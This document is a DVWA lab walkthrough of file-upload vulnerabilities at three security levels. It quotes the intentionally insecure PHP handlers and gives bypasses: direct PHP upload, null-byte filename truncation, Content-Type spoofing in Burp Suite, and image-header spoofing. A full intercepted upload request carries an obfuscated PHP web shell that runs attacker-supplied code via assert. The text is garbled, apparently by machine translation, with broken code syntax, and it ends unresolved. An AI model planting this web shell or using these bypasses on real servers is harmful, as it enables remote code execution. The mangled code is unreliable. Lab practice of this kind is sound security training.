DWVA Upload Vulnerability Mining Test example

Low
<?php

if (Isset ($_post[' Upload ')) {
Where are we going to is writing to?
$target _path = Dvwa_web_page_to_root. "Hackable/uploads/";
$target _path. = basename ($_files[' uploaded '] [' name ']);

Can we move the file to the upload folder?
if (!move_uploaded_file ($_files[' uploaded '] [' tmp_name '], $target _path)) {
No
Echo ' <pre>your image is not uploaded.</pre> ';
}
else {
yes!
echo "<pre>{$target _path} succesfully uploaded!</pre>";
}
}

?>
No restrictions on the file type, directly upload the php file, after the visit: http://localhost/hackable/uploads/XX.php can.

Medium
<?php

if (Isset ($_post[' Upload ')) {
Where are we going to is writing to?
$target _path = Dvwa_web_page_to_root. "Hackable/uploads/";
$target _path. = basename ($_files[' uploaded '] [' name ']);

File Information
$uploaded _name = $_files[' uploaded ' [' Name '];
$uploaded _type = $_files[' uploaded '] [' type '];
$uploaded _size = $_files[' uploaded '] [' size '];

Is it an image?
if ($uploaded _type = = "Image/jpeg" | | $uploaded _type = = "Image/png") &&
($uploaded _size < 100000)) {

Can we move the file to the upload folder?
if (!move_uploaded_file ($_files[' uploaded '] [' tmp_name '], $target _path)) {
No
Echo ' <pre>your image is not uploaded.</pre> ';
}
else {
yes!
echo "<pre>{$target _path} succesfully uploaded!</pre>";
}
}
else {
Invalid file
Echo ' <pre>your image is not uploaded. We can only accept JPEG or PNG images.</pre> ';
}
}

?>
Limit the files that are uploaded.
Workaround 1: Use the Burp Suite for 00 truncation, change the file name to 1.php. jpg (Note that there are spaces in the middle), and then change the space to 00 in the Intercept.
Workaround 2: Upload the 2.php file directly after the interception, the packet is as follows

post/vulnerabilities/upload/http/1.1
Host:localhost
user-agent:mozilla/5.0 (Windows NT 6.1; rv:43.0) gecko/20100101 firefox/43.0
accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
accept-language:zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-encoding:gzip, deflate
referer:http://localhost/vulnerabilities/upload/
cookie:phpsessid=pgke4molj8bath1fmdh7mvt686; Security=medium
Connection:keep-alive
Content-type:multipart/form-data; boundary=---------------------------143381619322555
content-length:549

-----------------------------143381619322555
Content-disposition:form-data; Name= "Max_file_size"

100000
-----------------------------143381619322555
Content-disposition:form-data; Name= "uploaded"; Filename= "2.php"
Content-type:application/octet-stream

<?php

$item [' wind '] = ' assert ';

$array [] = $item;

$array [0][' Wind '] ($_post[' loveautumn ']);

?>
-----------------------------143381619322555
Content-disposition:form-data; Name= "Upload"

Upload
-----------------------------143381619322555--
Change the red part to: Content-type:image/jpeg can be bypassed.

High:
<?php

if (Isset ($_post[' Upload ')) {
Where are we going to is writing to?
$target _path = Dvwa_web_page_to_root. "Hackable/uploads/";
$target _path. = basename ($_files[' uploaded '] [' name ']);

File Information
$uploaded _name = $_files[' uploaded ' [' Name '];
$uploaded _ext = substr ($uploaded _name, Strrpos ($uploaded _name, '. ') + 1);
$uploaded _size = $_files[' uploaded '] [' size '];
$uploaded _tmp = $_files[' uploaded '] [' tmp_name '];

Is it an image?
if (Strtolower ($uploaded _ext) = = "JPG" | | strtolower ($uploaded _ext) = = "JPEG" | | strtolower ($uploaded _ext) = "png ") &&
($uploaded _size < 100000) &&
GetImageSize ($uploaded _tmp)) {

Can we move the file to the upload folder?
if (!move_uploaded_file ($uploaded _tmp, $target _path)) {
No
Echo ' <pre>your image is not uploaded.</pre> ';
}
else {
yes!
echo "<pre>{$target _path} succesfully uploaded!</pre>";
}
}
else {
Invalid file
Echo ' <pre>your image is not uploaded. We can only accept JPEG or PNG images.</pre> ';
}
}

?>
There are strict restrictions on the naming and typing of pictures, so you can solve the problem by using the file head spoofing method. Also, assume that the file name 1.php.png,strrpos will intercept. The last place to appear is 5, after which substr renames the filename from sixth, which means that the file name that was eventually uploaded will be converted to PNG and will be intercepted.
First use Notepad to edit the normal picture file, php a sentence code written to the bottom of the picture, save. This allows the detection of file types to be spoofed.
Finally, the renaming of the filename is bypassed. Change file name to 1.php. PNG upload, intercept with Burpsuite:
Content-disposition:form-data; Name= "uploaded"; The Filename= "1.php. png" section is modified to
Content-disposition:form-data; Name= "uploaded"; Filename= "1.php\x00.php. png" allows you to get a x00.php. png file, which is mentioned in an article in which PHP files have been uploaded with arbitrary file vulnerabilities. Invalid for space truncation. Currently do not know the final answer, it is possible to upload a message containing a JPG file after the adoption of file inclusion to complete? Temporary doubt